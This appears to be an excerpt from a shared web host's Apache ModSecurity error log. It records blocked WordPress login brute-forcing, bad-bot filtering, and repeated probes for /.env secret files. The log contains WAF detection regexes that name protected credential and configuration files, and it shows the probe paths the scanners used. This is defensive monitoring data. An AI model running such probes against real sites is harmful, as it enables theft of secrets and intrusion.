[Tue May 26 19:41:38.152153 2026] [security2:error] [pid 70836:tid 71091] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqGe_FvbQ_BhqVMRWR4QAAAQI"]
[Tue May 26 19:41:38.853468 2026] [security2:error] [pid 70836:tid 71038] [client 188.130.142.12:53105] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWqGu_FvbQ_BhqVMRWR9QAAAM0"], referer: https://anujtradingco.com
[Tue May 26 19:41:39.760359 2026] [security2:error] [pid 70836:tid 71042] [client 157.90.156.63:40578] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWqG-_FvbQ_BhqVMRWSEAAAANE"], referer: http://ucdc.co.in/
[Tue May 26 19:41:40.543989 2026] [security2:error] [pid 70836:tid 70973] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqHO_FvbQ_BhqVMRWSJgAAAIw"]
[Tue May 26 19:41:41.255657 2026] [security2:error] [pid 70836:tid 70921] [remote 141.138.139.98:50978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqHe_FvbQ_BhqVMRWSQgAAjVQ"]
[Tue May 26 19:41:41.956601 2026] [security2:error] [pid 70836:tid 70975] [client 14.161.207.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqHe_FvbQ_BhqVMRWSVQAAAI4"]
[Tue May 26 19:41:42.469939 2026] [security2:error] [pid 70836:tid 70993] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqHu_FvbQ_BhqVMRWSYQAAAKA"]
[Tue May 26 19:41:42.650873 2026] [security2:error] [pid 70836:tid 70935] [remote 141.138.139.98:50978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.139.138.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqHu_FvbQ_BhqVMRWSdAAAv2I"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:41:44.824986 2026] [security2:error] [pid 70836:tid 70958] [remote 123.30.233.13:46020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqIO_FvbQ_BhqVMRWSsQAAsHk"]
[Tue May 26 19:41:44.836291 2026] [security2:error] [pid 70836:tid 71047] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqIO_FvbQ_BhqVMRWSsAAAANY"]
[Tue May 26 19:41:45.308503 2026] [security2:error] [pid 70836:tid 71086] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqIe_FvbQ_BhqVMRWSzgAAAP0"]
[Tue May 26 19:41:45.308536 2026] [security2:error] [pid 70836:tid 71086] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqIe_FvbQ_BhqVMRWSzgAAAP0"]
[Tue May 26 19:41:45.309027 2026] [security2:error] [pid 70836:tid 70982] [client 65.109.156.37:62121] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/features/media-gallery/"] [unique_id "ahWqIe_FvbQ_BhqVMRWSzAAAAJU"]
[Tue May 26 19:41:45.402243 2026] [security2:error] [pid 70836:tid 70936] [remote 123.30.233.13:46020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqIe_FvbQ_BhqVMRWS0AAAiWM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:41:45.628274 2026] [security2:error] [pid 70836:tid 70844] [remote 222.252.11.23:19483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.11.252.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqIe_FvbQ_BhqVMRWS0QAA9wc"]
[Tue May 26 19:41:45.713903 2026] [security2:error] [pid 70836:tid 71087] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqIe_FvbQ_BhqVMRWS1wAAAP4"]
[Tue May 26 19:41:45.713939 2026] [security2:error] [pid 70836:tid 71087] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWqIe_FvbQ_BhqVMRWS1wAAAP4"]
[Tue May 26 19:41:45.714438 2026] [security2:error] [pid 70836:tid 71013] [client 65.109.156.37:62313] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/features/media-gallery/"] [unique_id "ahWqIe_FvbQ_BhqVMRWS1QAAALQ"]
[Tue May 26 19:41:46.619749 2026] [fcgid:warn] [pid 70836:tid 70979] (70014)End of file found: [client 192.241.240.154:55058] mod_fcgid: can't get data from http client
[Tue May 26 19:41:47.163091 2026] [security2:error] [pid 70836:tid 70945] [remote 54.38.29.86:55426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqIu_FvbQ_BhqVMRWTCwAAw2w"]
[Tue May 26 19:41:47.551455 2026] [security2:error] [pid 70836:tid 70839] [remote 54.38.29.86:55426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqI-_FvbQ_BhqVMRWTHwAA4wI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:41:47.726991 2026] [security2:error] [pid 70836:tid 70990] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqI-_FvbQ_BhqVMRWTHgAAAJ0"]
[Tue May 26 19:41:48.028177 2026] [security2:error] [pid 70836:tid 71025] [client 192.241.240.154:56252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.240.241.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahWqI-_FvbQ_BhqVMRWTJgAAAMA"]
[Tue May 26 19:41:48.326982 2026] [security2:error] [pid 70836:tid 70973] [client 192.241.240.154:56800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "svijaykumar.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWqJO_FvbQ_BhqVMRWTNQAAAIw"]
[Tue May 26 19:41:48.587888 2026] [security2:error] [pid 70836:tid 70837] [remote 103.91.67.202:30942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWqJO_FvbQ_BhqVMRWTPAAA5wA"]
[Tue May 26 19:41:49.097148 2026] [security2:error] [pid 70836:tid 70929] [remote 222.252.11.23:19483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.11.252.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqJe_FvbQ_BhqVMRWTUAAA_Fw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:41:50.014515 2026] [security2:error] [pid 70836:tid 71091] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqJe_FvbQ_BhqVMRWTXQAAAQI"]
[Tue May 26 19:41:50.328243 2026] [autoindex:error] [pid 70836:tid 71023] [client 136.118.37.109:64488] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:41:52.430763 2026] [security2:error] [pid 70836:tid 71082] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqJ-_FvbQ_BhqVMRWTmwAAAPk"]
[Tue May 26 19:41:54.662574 2026] [security2:error] [pid 70836:tid 71006] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqKu_FvbQ_BhqVMRWT4QAAAK0"]
[Tue May 26 19:41:56.616921 2026] [security2:error] [pid 70836:tid 70998] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqLO_FvbQ_BhqVMRWUFQAAAKU"]
[Tue May 26 19:41:56.658810 2026] [security2:error] [pid 70836:tid 71086] [client 176.65.139.229:31744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cliffengg.svijaykumar.in"] [uri "/.env"] [unique_id "ahWqLO_FvbQ_BhqVMRWUHQAAAP0"]
[Tue May 26 19:41:57.062550 2026] [security2:error] [pid 70836:tid 71019] [client 85.208.96.201:52588] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahWqLe_FvbQ_BhqVMRWULQAAALo"]
[Tue May 26 19:41:57.062674 2026] [security2:error] [pid 70836:tid 71019] [client 85.208.96.201:52588] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahWqLe_FvbQ_BhqVMRWULQAAALo"]
[Tue May 26 19:41:57.182434 2026] [security2:error] [pid 70836:tid 71064] [client 114.119.137.91:64493] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "consultrgb.com"] [uri "/robots.txt"] [unique_id "ahWqLe_FvbQ_BhqVMRWUMQAAAOc"]
[Tue May 26 19:41:57.876571 2026] [security2:error] [pid 70836:tid 70908] [remote 74.7.241.58:47938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWqLe_FvbQ_BhqVMRWURwAAsEc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:41:58.911916 2026] [security2:error] [pid 70836:tid 71062] [client 176.65.139.237:19042] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "crusties.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqLu_FvbQ_BhqVMRWUYwAAAOU"]
[Tue May 26 19:41:59.212339 2026] [security2:error] [pid 70836:tid 71038] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWqLu_FvbQ_BhqVMRWUXwAAAM0"]
[Tue May 26 19:41:59.401208 2026] [security2:error] [pid 70836:tid 71070] [client 176.65.139.236:16900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "herbalplus.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqL-_FvbQ_BhqVMRWUcwAAAO0"]
[Tue May 26 19:41:59.473407 2026] [security2:error] [pid 70836:tid 70899] [remote 38.95.35.74:44846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqL-_FvbQ_BhqVMRWUcgAAsz4"]
[Tue May 26 19:41:59.649531 2026] [security2:error] [pid 70836:tid 70979] [client 176.65.139.231:22046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "plenitudotonal.jhonweb.com"] [uri "/.env"] [unique_id "ahWqL-_FvbQ_BhqVMRWUegAAAJI"]
[Tue May 26 19:41:59.864897 2026] [security2:error] [pid 70836:tid 71008] [client 176.65.139.231:46366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "couplesspot.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqL-_FvbQ_BhqVMRWUfwAAAK8"]
[Tue May 26 19:41:59.973140 2026] [security2:error] [pid 70836:tid 70909] [remote 222.165.190.235:50698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWqL-_FvbQ_BhqVMRWUewAAkUg"]
[Tue May 26 19:42:00.064258 2026] [security2:error] [pid 70836:tid 71084] [client 176.65.139.229:64950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "enattafoodparcel.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMO_FvbQ_BhqVMRWUhgAAAPs"]
[Tue May 26 19:42:00.157645 2026] [security2:error] [pid 70836:tid 71067] [client 176.65.139.234:33170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "buyrepublic.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMO_FvbQ_BhqVMRWUigAAAOo"]
[Tue May 26 19:42:00.179490 2026] [security2:error] [pid 70836:tid 71022] [client 176.65.139.236:16910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rethinkinclusion.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMO_FvbQ_BhqVMRWUjgAAAL0"]
[Tue May 26 19:42:00.184929 2026] [security2:error] [pid 70836:tid 70983] [client 176.65.139.237:19046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "strapptech.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMO_FvbQ_BhqVMRWUjwAAAJY"]
[Tue May 26 19:42:00.316713 2026] [security2:error] [pid 70836:tid 70986] [client 176.65.139.232:42534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "osanctus.org.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMO_FvbQ_BhqVMRWUkAAAAJk"]
[Tue May 26 19:42:00.320106 2026] [security2:error] [pid 70836:tid 71002] [client 176.65.139.234:33184] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ameritradeng.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMO_FvbQ_BhqVMRWUkQAAAKk"]
[Tue May 26 19:42:00.438446 2026] [security2:error] [pid 70836:tid 70906] [remote 222.165.190.235:50698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWqMO_FvbQ_BhqVMRWUkgAA9kU"], referer: https://nicmaperu.com/wp-login.php
[Tue May 26 19:42:00.617161 2026] [security2:error] [pid 70836:tid 70938] [remote 38.95.35.74:44846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWqMO_FvbQ_BhqVMRWUlgAAwWU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:42:00.840920 2026] [security2:error] [pid 70836:tid 71048] [client 216.244.66.241:38454] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/f/dsg-08-EK-1107558"] [unique_id "ahWqMO_FvbQ_BhqVMRWUlwAAANc"]
[Tue May 26 19:42:00.841049 2026] [security2:error] [pid 70836:tid 71048] [client 216.244.66.241:38454] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/f/dsg-08-EK-1107558"] [unique_id "ahWqMO_FvbQ_BhqVMRWUlwAAANc"]
[Tue May 26 19:42:01.730198 2026] [security2:error] [pid 70836:tid 70984] [client 176.65.139.235:30498] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landmark.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWqMe_FvbQ_BhqVMRWUtwAAAJc"]
